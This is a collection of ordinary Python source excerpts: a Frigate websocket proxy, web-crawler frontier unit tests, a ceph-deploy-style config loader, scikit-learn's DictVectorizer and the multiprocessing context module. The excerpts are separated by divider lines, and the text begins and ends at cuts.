return web.Response(status=HTTPStatus.FORBIDDEN)
full_path = self._create_path(**kwargs)
if not full_path:
return web.Response(status=HTTPStatus.NOT_FOUND)
req_protocols = []
if hdrs.SEC_WEBSOCKET_PROTOCOL in request.headers:
req_protocols = [
str(proto.strip())
for proto in request.headers[hdrs.SEC_WEBSOCKET_PROTOCOL].split(",")
]
ws_to_user = web.WebSocketResponse(
protocols=req_protocols, autoclose=False, autoping=False
)
await ws_to_user.prepare(request)
# Preparing
url = str(URL(config_entry.data[CONF_URL]) / full_path)
source_header = _init_header(request)
# Support GET query
if request.query_string:
url = f"{url}?{request.query_string}"
async with self._websession.ws_connect(
url,
headers=source_header,
protocols=req_protocols,
autoclose=False,
autoping=False,
) as ws_to_frigate:
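            # Pump messages in both directions; FIRST_COMPLETED returns as soon
            # as either direction finishes (e.g. one side closes the socket).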
await asyncio.wait(
[
self._proxy_msgs(ws_to_frigate, ws_to_user),
self._proxy_msgs(ws_to_user, ws_to_frigate),
],
return_when=asyncio.tasks.FIRST_COMPLETED,
)
return ws_to_user
class JSMPEGProxyView(WebsocketProxyView):
"""A proxy for JSMPEG websocket."""
url = "/api/frigate/{frigate_instance_id:.+}/jsmpeg/{path:.+}"
extra_urls = ["/api/frigate/jsmpeg/{path:.+}"]
name = "api:frigate:jsmpeg"
def _create_path(self, **kwargs: Any) -> str | None:
"""Create path."""
return f"live/{kwargs['path']}"
def _init_header(request: web.Request) -> CIMultiDict | dict[str, str]:
"""Create initial header."""
headers = {}
# filter flags
for name, value in request.headers.items():
if name in (
hdrs.CONTENT_LENGTH,
hdrs.CONTENT_ENCODING,
hdrs.SEC_WEBSOCKET_EXTENSIONS,
hdrs.SEC_WEBSOCKET_PROTOCOL,
hdrs.SEC_WEBSOCKET_VERSION,
hdrs.SEC_WEBSOCKET_KEY,
hdrs.HOST,
):
continue
headers[name] = value
# Set X-Forwarded-For
forward_for = request.headers.get(hdrs.X_FORWARDED_FOR)
assert request.transport
connected_ip = ip_address(request.transport.get_extra_info("peername")[0])
if forward_for:
forward_for = f"{forward_for}, {connected_ip!s}"
else:
forward_for = f"{connected_ip!s}"
headers[hdrs.X_FORWARDED_FOR] = forward_for
# Set X-Forwarded-Host
forward_host = request.headers.get(hdrs.X_FORWARDED_HOST)
if not forward_host:
forward_host = request.host
headers[hdrs.X_FORWARDED_HOST] = forward_host
# Set X-Forwarded-Proto
forward_proto = request.headers.get(hdrs.X_FORWARDED_PROTO)
if not forward_proto:
forward_proto = request.url.scheme
headers[hdrs.X_FORWARDED_PROTO] = forward_proto
return headers
def _response_header(response: aiohttp.ClientResponse) -> dict[str, str]:
"""Create response header."""
headers = {}
for name, value in response.headers.items():
if name in (
hdrs.TRANSFER_ENCODING,
# Removing Content-Length header for streaming responses
# prevents seeking from working for mp4 files
# hdrs.CONTENT_LENGTH,
hdrs.CONTENT_TYPE,
hdrs.CONTENT_ENCODING,
):
continue
headers[name] = value
return headers
|
|
#
# Copyright (c) 2011 Daniel Truemper [email protected]
#
# test_frontier.py 27-Jan-2011
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from logging import StreamHandler
import time
from datetime import datetime, timedelta
import unittest
import sys
from spyder.core.constants import *
from spyder.core.frontier import *
from spyder.time import serialize_date_time, deserialize_date_time
from spyder.core.prioritizer import SimpleTimestampPrioritizer
from spyder.core.settings import Settings
from spyder.core.sink import AbstractCrawlUriSink
from spyder.core.sqlitequeues import SQLiteSingleHostUriQueue
from spyder.thrift.gen.ttypes import CrawlUri
class BaseFrontierTest(unittest.TestCase):
def test_adding_uri_works(self):
now = datetime(*datetime.fromtimestamp(time.time()).timetuple()[0:6])
next_crawl_date = now + timedelta(days=1)
s = Settings()
s.FRONTIER_STATE_FILE = ":memory:"
curi = CrawlUri("http://localhost")
curi.rep_header = { "Etag" : "123", "Date" : serialize_date_time(now) }
curi.current_priority = 2
frontier = AbstractBaseFrontier(s, StreamHandler(sys.stdout),
SQLiteSingleHostUriQueue(s.FRONTIER_STATE_FILE),
SimpleTimestampPrioritizer(s))
frontier.add_uri(curi)
for uri in frontier._front_end_queues.queue_head():
(url, etag, mod_date, queue, next_date) = uri
self.assertEqual("http://localhost", url)
self.assertEqual("123", etag)
self.assertEqual(now, datetime.fromtimestamp(mod_date))
frontier._current_uris[url] = uri
def test_crawluri_from_uri(self):
now = datetime(*datetime.fromtimestamp(time.time()).timetuple()[0:6])
now_timestamp = time.mktime(now.timetuple())
next_crawl_date = now + timedelta(days=1)
next_crawl_date_timestamp = time.mktime(next_crawl_date.timetuple())
s = Settings()
s.FRONTIER_STATE_FILE = ":memory:"
frontier = AbstractBaseFrontier(s, StreamHandler(sys.stdout),
SQLiteSingleHostUriQueue(s.FRONTIER_STATE_FILE),
SimpleTimestampPrioritizer(s))
uri = ("http://localhost", "123", now_timestamp, 1,
next_crawl_date_timestamp)
curi = frontier._crawluri_from_uri(uri)
self.assertEqual("http://localhost", curi.url)
self.assertEqual("123", curi.req_header["Etag"])
self.assertEqual(serialize_date_time(now), curi.req_header["Last-Modified"])
def test_crawluri_from_uri_with_credentials(self):
now = datetime(*datetime.fromtimestamp(time.time()).timetuple()[0:6])
now_timestamp = time.mktime(now.timetuple())
next_crawl_date = now + timedelta(days=1)
next_crawl_date_timestamp = time.mktime(next_crawl_date.timetuple())
s = Settings()
s.FRONTIER_STATE_FILE = ":memory:"
frontier = AbstractBaseFrontier(s, StreamHandler(sys.stdout),
SQLiteSingleHostUriQueue(s.FRONTIER_STATE_FILE),
SimpleTimestampPrioritizer(s))
uri = ("http://user:passwd@localhost", "123", now_timestamp, 1,
next_crawl_date_timestamp)
curi = frontier._crawluri_from_uri(uri)
self.assertEqual("http://user:passwd@localhost", curi.url)
self.assertEqual("123", curi.req_header["Etag"])
self.assertEqual(serialize_date_time(now),
curi.req_header["Last-Modified"])
self.assertEqual("user", curi.optional_vars[CURI_SITE_USERNAME])
self.assertEqual("passwd", curi.optional_vars[CURI_SITE_PASSWORD])
def test_sinks(self):
now = datetime(*datetime.fromtimestamp(time.time()).timetuple()[0:6])
s = Settings()
s.FRONTIER_STATE_FILE = ":memory:"
frontier = AbstractBaseFrontier(s, StreamHandler(sys.stdout),
SQLiteSingleHostUriQueue(s.FRONTIER_STATE_FILE),
SimpleTimestampPrioritizer(s))
frontier.add_sink(AbstractCrawlUriSink())
curi = CrawlUri("http://localhost")
curi.rep_header = { "Etag" : "123", "Date" : serialize_date_time(now) }
curi.current_priority = 2
frontier._add_to_heap(frontier._uri_from_curi(curi), 0)
frontier.process_successful_crawl(curi)
frontier._add_to_heap(frontier._uri_from_curi(curi), 0)
frontier.process_not_found(curi)
frontier._add_to_heap(frontier._uri_from_curi(curi), 0)
frontier.process_redirect(curi)
frontier._add_to_heap(frontier._uri_from_curi(curi), 0)
frontier.process_server_error(curi)
class SingleHostFrontierTest(unittest.TestCase):
def test_that_updating_heap_works(self):
s = Settings()
s.FRONTIER_STATE_FILE = ":memory:"
frontier = SingleHostFrontier(s, StreamHandler(sys.stdout))
q1 = []
q2 = []
now = datetime(*datetime.fromtimestamp(
time.time()).timetuple()[0:6]) - timedelta(days=2)
for i in range(1, 20):
curi = CrawlUri("http://localhost/test/%s" % i)
curi.current_priority = (i % 2 + 1)
curi.rep_header = { "Etag" : "123%s" % i, "Date" : serialize_date_time(now) }
frontier.add_uri(curi)
if i % 2 == 0:
(url, etag, mod_date, next_date, prio) = frontier._uri_from_curi(curi)
next_date = next_date - 1000 * 60 * 5
frontier._front_end_queues.update_uri((url, etag, mod_date,
next_date, prio))
q2.append(curi.url)
else:
q1.append(curi.url)
self.assertRaises(Empty, frontier._heap.get_nowait)
for i in range(1, 10):
frontier._next_possible_crawl = time.time()
candidate_uri = frontier.get_next()
if candidate_uri.url in q1:
self.assertTrue(candidate_uri.url in q1)
q1.remove(candidate_uri.url)
elif candidate_uri.url in q2:
self.assertTrue(candidate_uri.url in q2)
q2.remove(candidate_uri.url)
self.assertEqual(10, len(q1))
self.assertEqual(0, len(q2))
self.assertRaises(Empty, frontier.get_next)
def test_that_time_based_politeness_works(self):
s = Settings()
s.FRONTIER_STATE_FILE = ":memory:"
frontier = SingleHostFrontier(s, StreamHandler(sys.stdout))
now = datetime(*datetime.fromtimestamp(
time.time()).timetuple()[0:6]) - timedelta(days=2)
curi = CrawlUri("http://localhost/test")
curi.current_priority = 3
curi.rep_header = { "Etag" : "123", "Date" : serialize_date_time(now) }
curi.req_time = 0.5
frontier._add_to_heap(frontier._uri_from_curi(curi), 0)
a = frontier._next_possible_crawl
frontier.process_successful_crawl(curi)
self.assertTrue(frontier._next_possible_crawl > a)
self.assertTrue(frontier._next_possible_crawl > time.time())
self.assertRaises(Empty, frontier.get_next)
if __name__ == '__main__':
unittest.main()
|
|
from ConfigParser import SafeConfigParser, NoSectionError, NoOptionError
import logging
import os
from os import path
import re
from megdc.util.paths import gpg
logger = logging.getLogger('ceph_deploy.conf')
cd_conf_template = """
#
# ceph-deploy configuration file
#
[ceph-deploy-global]
# Overrides for some of ceph-deploy's global flags, like verbosity or cluster
# name
[ceph-deploy-install]
# Overrides for some of ceph-deploy's install flags, like version of ceph to
# install
#
# Repositories section
#
# yum repos:
# [myrepo]
# baseurl = https://user:[email protected]/rhel6
# gpgurl = https://example.org/keys/release.asc
# default = True
# extra-repos = cephrepo # will install the cephrepo file too
#
# [cephrepo]
# name=ceph repo noarch packages
# baseurl=http://ceph.com/rpm-emperor/el6/noarch
# enabled=1
# gpgcheck=1
# type=rpm-md
# gpgkey={gpgurl}
# apt repos:
# [myrepo]
# baseurl = https://user:[email protected]/
# gpgurl = https://example.org/keys/release.asc
# default = True
# extra-repos = cephrepo # will install the cephrepo file too
#
# [cephrepo]
# baseurl=http://ceph.com/rpm-emperor/el6/noarch
# gpgkey={gpgurl}
""".format(gpgurl=gpg.url('release'))
def location():
"""
Find and return the location of the ceph-deploy configuration file. If this
file does not exist, create one in a default location.
"""
return _locate_or_create()
def load():
parser = Conf()
parser.read(location())
return parser
def _locate_or_create():
home_config = path.expanduser('~/.megdc.conf')
# With order of importance
locations = [
path.join(os.getcwd(), 'megdc.conf'),
home_config,
]
for location in locations:
if path.exists(location):
logger.debug('found configuration file at: %s' % location)
return location
logger.info('could not find configuration file, will create one in $HOME')
create_stub(home_config)
return home_config
def create_stub(_path=None):
    _path = _path or path.expanduser('~/.megdc.conf')
logger.debug('creating new configuration file: %s' % _path)
with open(_path, 'w') as cd_conf:
cd_conf.write(cd_conf_template)
def set_overrides(args, _conf=None):
"""
Read the configuration file and look for ceph-deploy sections
to set flags/defaults from the values found. This will alter the
``args`` object that is created by argparse.
"""
    # Get the subcommand name to avoid overwriting values from other
    # subcommands that are not going to be used
subcommand = args.func.__name__
command_section = 'ceph-deploy-%s' % subcommand
conf = _conf or load()
for section_name in conf.sections():
if section_name in ['ceph-deploy-global', command_section]:
override_subcommand(
section_name,
conf.items(section_name),
args
)
return args
def override_subcommand(section_name, section_items, args):
"""
Given a specific section in the configuration file that maps to
    a subcommand (except for the global section), read all the keys that are
    actual argument flags and apply their values for that one subcommand.
Return the altered ``args`` object at the end.
"""
    # XXX We are not coercing any int-like values here, so if argparse does that
    # in the CLI we are not compliant with that expectation, but we will try to
    # infer a few boolean values.
    # Acceptable boolean states for flags:
_boolean_states = {'yes': True, 'true': True, 'on': True,
'no': False, 'false': False, 'off': False}
    for k, v in section_items:
# get the lower case value of `v`, fallback to the booleanized
# (original) value of `v`
try:
normalized_value = v.lower()
except AttributeError:
# probably not a string object that has .lower
normalized_value = v
value = _boolean_states.get(normalized_value, v)
setattr(args, k, value)
return args
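# A minimal sketch with hypothetical section contents: a [ceph-deploy-install]
# section containing "verbose = yes" and "release = firefly" would make
# override_subcommand() set args.verbose = True and args.release = 'firefly'.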
class Conf(SafeConfigParser):
"""
Subclasses from SafeConfigParser to give a few helpers for the ceph-deploy
configuration. Specifically, it addresses the need to work with custom
sections that signal the usage of custom repositories.
"""
reserved_sections = ['ceph-deploy-global', 'ceph-deploy-install']
def get_safe(self, section, key, default=None):
"""
Attempt to get a configuration value from a certain section
        in a ``cfg`` object, returning ``default`` if it is not found. Avoids the
        need to wrap every lookup in try/except for ConfigParser exceptions.
"""
try:
return self.get(section, key)
except (NoSectionError, NoOptionError):
return default
def get_repos(self):
"""
Return all the repo sections from the config, excluding the ceph-deploy
reserved sections.
"""
return [
section for section in self.sections()
if section not in self.reserved_sections
]
@property
def has_repos(self):
"""
boolean to reflect having (or not) any repository sections
"""
for section in self.sections():
if section not in self.reserved_sections:
return True
return False
def get_list(self, section, key):
"""
Assumes that the value for a given key is going to be a list
separated by commas. It gets rid of trailing comments.
        If just one item is present it returns a list with that single item; if
        the key is not found an empty list is returned.
"""
value = self.get_safe(section, key, [])
if value == []:
return value
# strip comments
value = re.split(r'\s+#', value)[0]
# split on commas
value = value.split(',')
# strip spaces
return [x.strip() for x in value]
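    # For example, a config line such as "extra-repos = repo1, repo2  # note"
    # comes back from get_list() as ['repo1', 'repo2'].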
def get_default_repo(self):
"""
Go through all the repositories defined in the config file and search
        for a truthy value for the ``default`` key. If there isn't any, return
        False.
"""
for repo in self.get_repos():
if self.get_safe(repo, 'default') and self.getboolean(repo, 'default'):
return repo
return False
|
|
# Authors: Lars Buitinck
# Dan Blanchard <[email protected]>
# License: BSD 3 clause
from array import array
from collections.abc import Mapping, Iterable
from operator import itemgetter
from numbers import Number
import numpy as np
import scipy.sparse as sp
from ..base import BaseEstimator, TransformerMixin
from ..utils import check_array, tosequence
from ..utils.deprecation import deprecated
def _tosequence(X):
"""Turn X into a sequence or ndarray, avoiding a copy if possible."""
if isinstance(X, Mapping): # single sample
return [X]
else:
return tosequence(X)
class DictVectorizer(TransformerMixin, BaseEstimator):
"""Transforms lists of feature-value mappings to vectors.
This transformer turns lists of mappings (dict-like objects) of feature
names to feature values into Numpy arrays or scipy.sparse matrices for use
with scikit-learn estimators.
When feature values are strings, this transformer will do a binary one-hot
(aka one-of-K) coding: one boolean-valued feature is constructed for each
of the possible string values that the feature can take on. For instance,
a feature "f" that can take on the values "ham" and "spam" will become two
features in the output, one signifying "f=ham", the other "f=spam".
If a feature value is a sequence or set of strings, this transformer
will iterate over the values and will count the occurrences of each string
value.
However, note that this transformer will only do a binary one-hot encoding
when feature values are of type string. If categorical features are
represented as numeric values such as int or iterables of strings, the
DictVectorizer can be followed by
:class:`~sklearn.preprocessing.OneHotEncoder` to complete
binary one-hot encoding.
Features that do not occur in a sample (mapping) will have a zero value
in the resulting array/matrix.
Read more in the :ref:`User Guide <dict_feature_extraction>`.
Parameters
----------
dtype : dtype, default=np.float64
The type of feature values. Passed to Numpy array/scipy.sparse matrix
constructors as the dtype argument.
separator : str, default="="
Separator string used when constructing new features for one-hot
coding.
sparse : bool, default=True
Whether transform should produce scipy.sparse matrices.
sort : bool, default=True
Whether ``feature_names_`` and ``vocabulary_`` should be
sorted when fitting.
Attributes
----------
vocabulary_ : dict
A dictionary mapping feature names to feature indices.
feature_names_ : list
A list of length n_features containing the feature names (e.g., "f=ham"
and "f=spam").
See Also
--------
FeatureHasher : Performs vectorization using only a hash function.
sklearn.preprocessing.OrdinalEncoder : Handles nominal/categorical
features encoded as columns of arbitrary data types.
Examples
--------
>>> from sklearn.feature_extraction import DictVectorizer
>>> v = DictVectorizer(sparse=False)
>>> D = [{'foo': 1, 'bar': 2}, {'foo': 3, 'baz': 1}]
>>> X = v.fit_transform(D)
>>> X
array([[2., 0., 1.],
[0., 1., 3.]])
>>> v.inverse_transform(X) == [{'bar': 2.0, 'foo': 1.0},
... {'baz': 1.0, 'foo': 3.0}]
True
>>> v.transform({'foo': 4, 'unseen_feature': 3})
array([[0., 0., 4.]])
"""
def __init__(self, *, dtype=np.float64, separator="=", sparse=True, sort=True):
self.dtype = dtype
self.separator = separator
self.sparse = sparse
self.sort = sort
def _add_iterable_element(
self,
f,
v,
feature_names,
vocab,
*,
fitting=True,
transforming=False,
indices=None,
values=None,
):
"""Add feature names for iterable of strings"""
for vv in v:
if isinstance(vv, str):
feature_name = "%s%s%s" % (f, self.separator, vv)
vv = 1
else:
raise TypeError(
f"Unsupported type {type(vv)} in iterable "
"value. Only iterables of string are "
"supported."
)
if fitting and feature_name not in vocab:
vocab[feature_name] = len(feature_names)
feature_names.append(feature_name)
if transforming and feature_name in vocab:
indices.append(vocab[feature_name])
values.append(self.dtype(vv))
def fit(self, X, y=None):
"""Learn a list of feature name -> indices mappings.
Parameters
----------
X : Mapping or iterable over Mappings
Dict(s) or Mapping(s) from feature names (arbitrary Python
objects) to feature values (strings or convertible to dtype).
.. versionchanged:: 0.24
Accepts multiple string values for one categorical feature.
y : (ignored)
Ignored parameter.
Returns
-------
self : object
DictVectorizer class instance.
"""
feature_names = []
vocab = {}
for x in X:
for f, v in x.items():
if isinstance(v, str):
feature_name = "%s%s%s" % (f, self.separator, v)
v = 1
elif isinstance(v, Number) or (v is None):
feature_name = f
elif isinstance(v, Mapping):
raise TypeError(
f"Unsupported value type {type(v)} "
f"for {f}: {v}.\n"
"Mapping objects are not supported."
)
elif isinstance(v, Iterable):
feature_name = None
self._add_iterable_element(f, v, feature_names, vocab)
if feature_name is not None:
if feature_name not in vocab:
vocab[feature_name] = len(feature_names)
feature_names.append(feature_name)
if self.sort:
feature_names.sort()
vocab = {f: i for i, f in enumerate(feature_names)}
self.feature_names_ = feature_names
self.vocabulary_ = vocab
return self
def _transform(self, X, fitting):
# Sanity check: Python's array has no way of explicitly requesting the
# signed 32-bit integers that scipy.sparse needs, so we use the next
# best thing: typecode "i" (int). However, if that gives larger or
# smaller integers than 32-bit ones, np.frombuffer screws up.
assert array("i").itemsize == 4, (
"sizeof(int) != 4 on your platform; please report this at"
" https://github.com/scikit-learn/scikit-learn/issues and"
" include the output from platform.platform() in your bug report"
)
dtype = self.dtype
if fitting:
feature_names = []
vocab = {}
else:
feature_names = self.feature_names_
vocab = self.vocabulary_
transforming = True
# Process everything as sparse regardless of setting
X = [X] if isinstance(X, Mapping) else X
indices = array("i")
indptr = [0]
# XXX we could change values to an array.array as well, but it
# would require (heuristic) conversion of dtype to typecode...
values = []
# collect all the possible feature names and build sparse matrix at
# same time
for x in X:
for f, v in x.items():
if isinstance(v, str):
feature_name = "%s%s%s" % (f, self.separator, v)
v = 1
elif isinstance(v, Number) or (v is None):
feature_name = f
elif not isinstance(v, Mapping) and isinstance(v, Iterable):
feature_name = None
self._add_iterable_element(
f,
v,
feature_names,
vocab,
fitting=fitting,
transforming=transforming,
indices=indices,
values=values,
)
else:
raise TypeError(
f"Unsupported value Type {type(v)} "
f"for {f}: {v}.\n"
f"{type(v)} objects are not supported."
)
if feature_name is not None:
if fitting and feature_name not in vocab:
vocab[feature_name] = len(feature_names)
feature_names.append(feature_name)
if feature_name in vocab:
indices.append(vocab[feature_name])
values.append(self.dtype(v))
indptr.append(len(indices))
if len(indptr) == 1:
raise ValueError("Sample sequence X is empty.")
indices = np.frombuffer(indices, dtype=np.intc)
shape = (len(indptr) - 1, len(vocab))
result_matrix = sp.csr_matrix(
(values, indices, indptr), shape=shape, dtype=dtype
)
# Sort everything if asked
if fitting and self.sort:
feature_names.sort()
map_index = np.empty(len(feature_names), dtype=np.int32)
for new_val, f in enumerate(feature_names):
map_index[new_val] = vocab[f]
vocab[f] = new_val
result_matrix = result_matrix[:, map_index]
if self.sparse:
result_matrix.sort_indices()
else:
result_matrix = result_matrix.toarray()
if fitting:
self.feature_names_ = feature_names
self.vocabulary_ = vocab
return result_matrix
def fit_transform(self, X, y=None):
"""Learn a list of feature name -> indices mappings and transform X.
Like fit(X) followed by transform(X), but does not require
materializing X in memory.
Parameters
----------
X : Mapping or iterable over Mappings
Dict(s) or Mapping(s) from feature names (arbitrary Python
objects) to feature values (strings or convertible to dtype).
.. versionchanged:: 0.24
Accepts multiple string values for one categorical feature.
y : (ignored)
Ignored parameter.
Returns
-------
Xa : {array, sparse matrix}
Feature vectors; always 2-d.
"""
return self._transform(X, fitting=True)
def inverse_transform(self, X, dict_type=dict):
"""Transform array or sparse matrix X back to feature mappings.
X must have been produced by this DictVectorizer's transform or
fit_transform method; it may only have passed through transformers
that preserve the number of features and their order.
In the case of one-hot/one-of-K coding, the constructed feature
names and values are returned rather than the original ones.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Sample matrix.
dict_type : type, default=dict
Constructor for feature mappings. Must conform to the
collections.Mapping API.
Returns
-------
D : list of dict_type objects of shape (n_samples,)
Feature mappings for the samples in X.
"""
# COO matrix is not subscriptable
X = check_array(X, accept_sparse=["csr", "csc"])
n_samples = X.shape[0]
names = self.feature_names_
dicts = [dict_type() for _ in range(n_samples)]
if sp.issparse(X):
for i, j in zip(*X.nonzero()):
dicts[i][names[j]] = X[i, j]
else:
for i, d in enumerate(dicts):
for j, v in enumerate(X[i, :]):
if v != 0:
d[names[j]] = X[i, j]
return dicts
def transform(self, X):
"""Transform feature->value dicts to array or sparse matrix.
Named features not encountered during fit or fit_transform will be
silently ignored.
Parameters
----------
X : Mapping or iterable over Mappings of shape (n_samples,)
Dict(s) or Mapping(s) from feature names (arbitrary Python
objects) to feature values (strings or convertible to dtype).
Returns
-------
Xa : {array, sparse matrix}
Feature vectors; always 2-d.
"""
return self._transform(X, fitting=False)
@deprecated(
"get_feature_names is deprecated in 1.0 and will be removed "
"in 1.2. Please use get_feature_names_out instead."
)
def get_feature_names(self):
"""Return a list of feature names, ordered by their indices.
If one-of-K coding is applied to categorical features, this will
include the constructed feature names but not the original ones.
Returns
-------
feature_names_ : list of length (n_features,)
List containing the feature names (e.g., "f=ham" and "f=spam").
"""
return self.feature_names_
def get_feature_names_out(self, input_features=None):
"""Get output feature names for transformation.
Parameters
----------
input_features : array-like of str or None, default=None
Not used, present here for API consistency by convention.
Returns
-------
feature_names_out : ndarray of str objects
Transformed feature names.
"""
if any(not isinstance(name, str) for name in self.feature_names_):
feature_names = [str(name) for name in self.feature_names_]
else:
feature_names = self.feature_names_
return np.asarray(feature_names, dtype=object)
def restrict(self, support, indices=False):
"""Restrict the features to those in support using feature selection.
This function modifies the estimator in-place.
Parameters
----------
support : array-like
Boolean mask or list of indices (as returned by the get_support
member of feature selectors).
indices : bool, default=False
Whether support is a list of indices.
Returns
-------
self : object
DictVectorizer class instance.
Examples
--------
>>> from sklearn.feature_extraction import DictVectorizer
>>> from sklearn.feature_selection import SelectKBest, chi2
>>> v = DictVectorizer()
>>> D = [{'foo': 1, 'bar': 2}, {'foo': 3, 'baz': 1}]
>>> X = v.fit_transform(D)
>>> support = SelectKBest(chi2, k=2).fit(X, [0, 1])
>>> v.get_feature_names_out()
array(['bar', 'baz', 'foo'], ...)
>>> v.restrict(support.get_support())
DictVectorizer()
>>> v.get_feature_names_out()
array(['bar', 'foo'], ...)
"""
if not indices:
support = np.where(support)[0]
names = self.feature_names_
new_vocab = {}
for i in support:
new_vocab[names[i]] = len(new_vocab)
self.vocabulary_ = new_vocab
self.feature_names_ = [
f for f, i in sorted(new_vocab.items(), key=itemgetter(1))
]
return self
def _more_tags(self):
return {"X_types": ["dict"]}
|
|
import os
import sys
import threading
from . import process
from . import reduction
__all__ = [] # things are copied from here to __init__.py
#
# Exceptions
#
class ProcessError(Exception):
pass
class BufferTooShort(ProcessError):
pass
class TimeoutError(ProcessError):
pass
class AuthenticationError(ProcessError):
pass
#
# Base type for contexts
#
class BaseContext(object):
ProcessError = ProcessError
BufferTooShort = BufferTooShort
TimeoutError = TimeoutError
AuthenticationError = AuthenticationError
current_process = staticmethod(process.current_process)
active_children = staticmethod(process.active_children)
def cpu_count(self):
'''Returns the number of CPUs in the system'''
num = os.cpu_count()
if num is None:
raise NotImplementedError('cannot determine number of cpus')
else:
return num
def Manager(self):
'''Returns a manager associated with a running server process
        The manager's methods such as `Lock()`, `Condition()` and `Queue()`
can be used to create shared objects.
'''
from .managers import SyncManager
m = SyncManager(ctx=self.get_context())
m.start()
return m
def Pipe(self, duplex=True):
        '''Returns two connection objects connected by a pipe'''
from .connection import Pipe
return Pipe(duplex)
def Lock(self):
'''Returns a non-recursive lock object'''
from .synchronize import Lock
return Lock(ctx=self.get_context())
def RLock(self):
'''Returns a recursive lock object'''
from .synchronize import RLock
return RLock(ctx=self.get_context())
def Condition(self, lock=None):
'''Returns a condition object'''
from .synchronize import Condition
return Condition(lock, ctx=self.get_context())
def Semaphore(self, value=1):
'''Returns a semaphore object'''
from .synchronize import Semaphore
return Semaphore(value, ctx=self.get_context())
def BoundedSemaphore(self, value=1):
'''Returns a bounded semaphore object'''
from .synchronize import BoundedSemaphore
return BoundedSemaphore(value, ctx=self.get_context())
def Event(self):
'''Returns an event object'''
from .synchronize import Event
return Event(ctx=self.get_context())
def Barrier(self, parties, action=None, timeout=None):
'''Returns a barrier object'''
from .synchronize import Barrier
return Barrier(parties, action, timeout, ctx=self.get_context())
def Queue(self, maxsize=0):
'''Returns a queue object'''
from .queues import Queue
return Queue(maxsize, ctx=self.get_context())
def JoinableQueue(self, maxsize=0):
'''Returns a queue object'''
from .queues import JoinableQueue
return JoinableQueue(maxsize, ctx=self.get_context())
def SimpleQueue(self):
'''Returns a queue object'''
from .queues import SimpleQueue
return SimpleQueue(ctx=self.get_context())
def Pool(self, processes=None, initializer=None, initargs=(),
maxtasksperchild=None):
'''Returns a process pool object'''
from .pool import Pool
return Pool(processes, initializer, initargs, maxtasksperchild,
context=self.get_context())
def RawValue(self, typecode_or_type, *args):
'''Returns a shared object'''
from .sharedctypes import RawValue
return RawValue(typecode_or_type, *args)
def RawArray(self, typecode_or_type, size_or_initializer):
'''Returns a shared array'''
from .sharedctypes import RawArray
return RawArray(typecode_or_type, size_or_initializer)
def Value(self, typecode_or_type, *args, lock=True):
'''Returns a synchronized shared object'''
from .sharedctypes import Value
return Value(typecode_or_type, *args, lock=lock,
ctx=self.get_context())
def Array(self, typecode_or_type, size_or_initializer, *, lock=True):
'''Returns a synchronized shared array'''
from .sharedctypes import Array
return Array(typecode_or_type, size_or_initializer, lock=lock,
ctx=self.get_context())
def freeze_support(self):
'''Check whether this is a fake forked process in a frozen executable.
If so then run code specified by commandline and exit.
'''
if sys.platform == 'win32' and getattr(sys, 'frozen', False):
from .spawn import freeze_support
freeze_support()
def get_logger(self):
'''Return package logger -- if it does not already exist then
it is created.
'''
from .util import get_logger
return get_logger()
def log_to_stderr(self, level=None):
'''Turn on logging and add a handler which prints to stderr'''
from .util import log_to_stderr
return log_to_stderr(level)
def allow_connection_pickling(self):
'''Install support for sending connections and sockets
between processes
'''
# This is undocumented. In previous versions of multiprocessing
# its only effect was to make socket objects inheritable on Windows.
from . import connection
def set_executable(self, executable):
'''Sets the path to a python.exe or pythonw.exe binary used to run
child processes instead of sys.executable when using the 'spawn'
start method. Useful for people embedding Python.
'''
from .spawn import set_executable
set_executable(executable)
def set_forkserver_preload(self, module_names):
'''Set list of module names to try to load in forkserver process.
This is really just a hint.
'''
from .forkserver import set_forkserver_preload
set_forkserver_preload(module_names)
def get_context(self, method=None):
if method is None:
return self
try:
ctx = _concrete_contexts[method]
except KeyError:
raise ValueError('cannot find context for %r' % method)
ctx._check_available()
return ctx
def get_start_method(self, allow_none=False):
return self._name
def set_start_method(self, method=None):
raise ValueError('cannot set start method of concrete context')
@property
def reducer(self):
'''Controls how objects will be reduced to a form that can be
shared with other processes.'''
return globals().get('reduction')
@reducer.setter
def reducer(self, reduction):
globals()['reduction'] = reduction
def _check_available(self):
pass
#
# Type of default context -- underlying context can be set at most once
#
class Process(process.BaseProcess):
_start_method = None
@staticmethod
def _Popen(process_obj):
return _default_context.get_context().Process._Popen(process_obj)
class DefaultContext(BaseContext):
Process = Process
def __init__(self, context):
self._default_context = context
self._actual_context = None
def get_context(self, method=None):
if method is None:
if self._actual_context is None:
self._actual_context = self._default_context
return self._actual_context
else:
return super().get_context(method)
def set_start_method(self, method, force=False):
if self._actual_context is not None and not force:
raise RuntimeError('context has already been set')
if method is None and force:
self._actual_context = None
return
self._actual_context = self.get_context(method)
def get_start_method(self, allow_none=False):
if self._actual_context is None:
if allow_none:
return None
self._actual_context = self._default_context
return self._actual_context._name
def get_all_start_methods(self):
if sys.platform == 'win32':
return ['spawn']
else:
if reduction.HAVE_SEND_HANDLE:
return ['fork', 'spawn', 'forkserver']
else:
return ['fork', 'spawn']
DefaultContext.__all__ = list(x for x in dir(DefaultContext) if x[0] != '_')
#
# Context types for fixed start method
#
if sys.platform != 'win32':
class ForkProcess(process.BaseProcess):
_start_method = 'fork'
@staticmethod
def _Popen(process_obj):
from .popen_fork import Popen
return Popen(process_obj)
class SpawnProcess(process.BaseProcess):
_start_method = 'spawn'
@staticmethod
def _Popen(process_obj):
from .popen_spawn_posix import Popen
return Popen(process_obj)
class ForkServerProcess(process.BaseProcess):
_start_method = 'forkserver'
@staticmethod
def _Popen(process_obj):
from .popen_forkserver import Popen
return Popen(process_obj)
class ForkContext(BaseContext):
_name = 'fork'
Process = ForkProcess
class SpawnContext(BaseContext):
_name = 'spawn'
Process = SpawnProcess
class ForkServerContext(BaseContext):
_name = 'forkserver'
Process = ForkServerProcess
def _check_available(self):
if not reduction.HAVE_SEND_HANDLE:
raise ValueError('forkserver start method not available')
_concrete_contexts = {
'fork': ForkContext(),
'spawn': SpawnContext(),
'forkserver': ForkServerContext(),
}
_default_context = DefaultContext(_concrete_contexts['fork'])
else:
